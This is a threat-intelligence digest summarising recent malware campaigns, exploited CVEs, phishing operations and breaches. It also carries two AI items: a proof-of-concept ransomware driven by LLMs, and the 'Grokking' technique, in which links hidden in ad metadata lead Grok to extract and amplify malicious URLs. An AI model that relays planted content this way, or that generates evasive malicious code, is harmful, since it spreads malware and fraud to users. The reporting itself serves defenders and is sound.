Researchers have demonstrated a novel AI-powered ransomware proof-of-concept that autonomously orchestrates attack lifecycles, highlighting significant future threats. - This technique leverages large language models (LLMs) to dynamically synthesize polymorphic malicious code, adapting to environments for reconnaissance, payload generation, and personalized extortion without human intervention. - The proof-of-concept evaded detection by major antivirus vendors, indicating the potential for sophisticated, hard-to-track attacks due to its polymorphic nature and varying telemetry. - The findings underscore the ease with which LLMs can be co-opted for cybercriminal operations, posing unique detection challenges and raising concerns about the effectiveness of current AI safety features.

A new China-aligned group is compromising Windows servers globally using novel custom malware to conduct SEO fraud-as-a-service, manipulating Google search rankings for third-party gambling sites. * The operation employs previously undocumented malware, including a passive C++ backdoor and a malicious IIS trojan that specifically modifies Googlebot responses to generate artificial backlinks. * Initial access is likely via SQL injection, followed by PowerShell-driven deployment of custom tools, such as privilege escalation exploits (e.g., Potato variants) and a website information collector. * At least 65 servers across diverse sectors have been compromised, with activity showing particular interest in South America and South Asia; some tools are signed with valid certificates.

Threat actors are actively exploiting a zero-day misconfiguration (CVE-2025-53690) in legacy Sitecore deployments, leveraging reused sample ASP.NET machine keys for remote code execution. * The vulnerability enables RCE via the `/sitecore/blocked.aspx` endpoint, deploying the novel WeepSteel reconnaissance backdoor which disguises data exfiltration as standard ViewState responses. * The multi-stage attack chain includes deploying tunneling tools and RATs, escalating privileges via credential dumping and token impersonation, and establishing persistence through service registration and account modifications. * Impacts specific Sitecore Experience products up to version 9.0 using static machine keys from pre-2017 documentation; immediate replacement, encryption, and regular rotation of these keys are critical mitigations.

A Lazarus subgroup has been observed exploiting a suspected Chrome zero-day vulnerability to deploy three distinct RATs—PondRAT, ThemeForestRAT, and RemotePE—in a sophisticated campaign targeting financial and cryptocurrency firms. The group's advanced TTPs include social engineering via Telegram, credential harvesting, and the use of custom tools for reconnaissance. The attack chain involves social engineering, exploitation, discovery, and next-stage deployment, with the actor swapping simpler RATs for the more advanced RemotePE to maintain deeper access. Organizations should harden endpoint telemetry, monitor for phantom-DLL loading, inspect abnormal Windows Performance Monitor files, audit HTTP(S) traffic for anomalous patterns, and adopt multi-factor authentication to mitigate risks.

A new campaign leverages a novel Terminal-based execution method to deploy a macOS stealer, effectively bypassing Gatekeeper and posing a significant threat to enterprise data. * This method tricks users into pasting malicious commands, enabling the stealer to establish persistence and exfiltrate a wide range of sensitive data. * The malware targets browser credentials, cryptocurrency wallets, Keychain items, and various personal and enterprise files. * Its sandbox evasion capabilities and broad data theft potential highlight the evolving risks for macOS environments. * Organizations must prioritize user education against social engineering and implement defense-in-depth strategies beyond built-in OS protections.

A sophisticated, previously undetected malware campaign leveraging SVG files to impersonate the national justice system was uncovered, demonstrating advanced evasion techniques. * Attackers embed JavaScript within SVG files to render convincing phishing lures and silently drop malicious ZIP archives. * The campaign employs code obfuscation, polymorphism, and dummy code to evade traditional antivirus detection, with samples dating back to August 2025. * Over 500 unique samples were identified, distributed primarily via email, showing payload evolution and adaptation. * This activity highlights the persistent use of modern web formats for highly evasive, multi-stage attacks.

A newly identified, secretive malware-as-a-service (MaaS) operation, TAG-150, is actively distributing custom remote access Trojans (RATs) and commercial infostealers, targeting critical organizations, including government entities. * The group operates without a visible Dark Web presence, suggesting an exclusive, sophisticated customer base. * TAG-150 developed two variants of its custom CastleRAT (C and Python), with the Python version designed for stealth, forcing Windows Defender exclusion, and largely evading antivirus detection. * Initial operations involved CastleLoader in over 1,600 attacks, achieving a 28.7% success rate, and leveraging Steam gaming communities for C2 dead drops. * The operation has potential links to ransomware activity and is expected to expand its custom malware development and distribution efforts.

Acronis TRU details a surge in campaigns abusing ConnectWise ScreenConnect for multi-RAT deployment, targeting U.S. organizations with evolving, stealthy tactics. * Malicious ClickOnce ScreenConnect installers fetch components at runtime, hindering traditional detection. * Initial dual deployment of AsyncRAT and a custom PowerShell RAT evolved to include PureHVNC via WMI and process hollowing into trusted processes. * Persistence shifted from noisy scheduled tasks to stealthier batch/VBS loaders and encoded .NET assemblies, showcasing high attacker adaptability. * Attackers reuse preconfigured Windows Server 2022 VMs for rapid redeployment, gaining privileged access that mimics legitimate RMM.

A novel cryptojacking campaign exploits Windows' `charmap.exe` to evade detection and covertly mine cryptocurrency. * The attack initiates via spear-phishing with a malicious shortcut, deploying a dropper that injects a custom miner directly into the legitimate Character Map process. * This fileless injection technique bypasses traditional antivirus and behavior-based detection, operating stealthily in memory. * Persistence is maintained through a scheduled task and DLL side-loading via `werfault.exe`. * Victims experience severe system performance degradation and increased energy consumption, with significant impact on healthcare and education sectors.

A sophisticated spearphishing campaign targets corporate executives using trusted OneDrive document-sharing notifications to steal credentials. The attack leverages highly tailored emails impersonating internal HR communications, with subject lines referencing salary amendments to create urgency. The phishing emails and login pages are customized with recipient details, enhancing authenticity. Attackers use Amazon SES for email delivery, rotating among 80 domains to evade detection. Anti-detection techniques include embedding hidden characters and obfuscating trigger words in light and dark mode email renditions. Single-use phishing URLs self-destruct upon access, complicating incident response. The campaign's focus on C-level targets and trusted communication themes poses significant risks, requiring a blend of user awareness, technical controls, and proactive threat hunting for mitigation.

CISA has issued an urgent warning regarding the active exploitation of two critical vulnerabilities in popular TP-Link router models, posing significant risks to home and small business networks. * The flaws, CVE-2025-9377 (OS command injection) and CVE-2023-50224 (authentication bypass), allow arbitrary command execution and credential access, respectively. * Both vulnerabilities are added to CISA's KEV catalog, with a mandatory remediation deadline for federal agencies. * Many affected devices are End-of-Life, complicating patching and increasing long-term security risks for users. * CISA strongly recommends immediate discontinuation of unsupported devices and applying vendor mitigations for others.

CISA has issued an urgent alert regarding an actively exploited zero-day use-after-free vulnerability (CVE-2025-48543) in Android Runtime. * This critical flaw enables attackers to escape the Chrome sandbox and achieve local privilege escalation on affected devices. * Active exploitation presents a significant risk, potentially leading to full device control, data theft, or malicious software installation. * Organizations and users must apply vendor patches and mitigations by September 25, 2025, to prevent unauthorized access and mitigate severe impact.

A critical vulnerability (CVE-2025-55190) in Argo CD allows low-privileged API tokens to retrieve all associated repository credentials, bypassing isolation mechanisms. This flaw, rated CVSS 10.0, enables tokens with even basic 'get' permissions to access sensitive usernames and passwords. Exploitation can lead to cloning private codebases, injecting malicious manifests, and supply chain attacks. The vulnerability affects all Argo CD versions up to 2.13.0, impacting numerous large enterprises using it for mission-critical deployments. Administrators are urged to upgrade to patched versions (e.g., 3.1.2, 3.0.14, 2.14.16, 2.13.9) immediately.

A critical ABAP code injection vulnerability (CVE-2025-42957) in SAP S/4HANA and related products is actively exploited in the wild, enabling low-privileged users to achieve full system takeover. * Exploit development is trivial due to the ease of reverse engineering the patch and the open nature of ABAP code. * Successful exploitation allows for data theft, manipulation, privilege escalation, backdoor accounts, credential theft, and operational disruption. * Many systems remain unpatched despite the vendor fix, leaving them exposed to ongoing, albeit limited, attacks. * Immediate application of August 2025 Patch Day updates is critical for affected SAP S/4HANA, Landscape Transformation, Business One, and NetWeaver AS ABAP systems.

A lawsuit against an education software provider underscores the severe repercussions of a massive data breach, revealing multiple security failures, persistent data exploitation, and legal accountability. * The incident involved three separate breaches of a customer support portal (August, September, December 2024), all exploiting the same compromised subcontractor credentials. * Over 62 million students' and 9.5 million teachers' sensitive personal and medical data was exposed, leading to an initial ransom payment. * Subsequent re-extortion attempts by an affiliate, impersonating a known threat group, targeted school districts using data from an earlier breach, highlighting persistent data monetization. * The primary attacker for the December breach pleaded guilty, with the lawsuit emphasizing legal accountability for inadequate data protection.

A global enforcement operation successfully dismantled Streameast, identified as the world's largest illicit live sports streaming network, culminating in arrests and asset seizures. * The network amassed over 1.6 billion visits across 80 domains within a year, offering a vast array of premium sports content. * Investigators linked the operation to a UAE-based shell company that laundered over $6 million in advertising revenue. * The takedown highlights the effectiveness of international collaboration in combating large-scale digital piracy and its financial infrastructure. * Experts warn of the persistent threat of piracy re-emergence due to sustained demand for free content.

Bridgestone Americas confirmed a cyber incident impacting manufacturing operations across multiple North American facilities. * The incident caused operational disruptions at production facilities in the US (South Carolina) and Canada (Quebec). * The company claims rapid containment prevented customer data theft or deep network infiltration. * Mitigation efforts are underway to address potential supply chain disruption and product shortages. * The specific attack type is unconfirmed, but a 2022 LockBit ransomware incident is mentioned for context.

Threat actors are exploiting X's Grok AI to bypass link posting restrictions and spread malicious links, significantly amplifying the reach of malicious ads. Key findings include the use of hidden metadata fields to embed malicious links, which Grok then extracts and promotes, increasing the credibility and distribution of these links. The technique, dubbed 'Grokking,' has been found to be highly effective, with some malicious ads reaching millions of impressions. Potential solutions include scanning all fields for malicious links and implementing context sanitization for Grok to prevent it from blindly echoing links.

A recent breach involving Salesforce and Salesloft's Drift integration has impacted multiple security firms. Notable aspects include the exploitation of third-party integrations, highlighting the risks associated with supply chain vulnerabilities. The breach underscores the need for enhanced security measures in third-party services and the importance of continuous monitoring for unauthorized access. Practical implications include the potential for widespread data exposure and the necessity for robust incident response plans.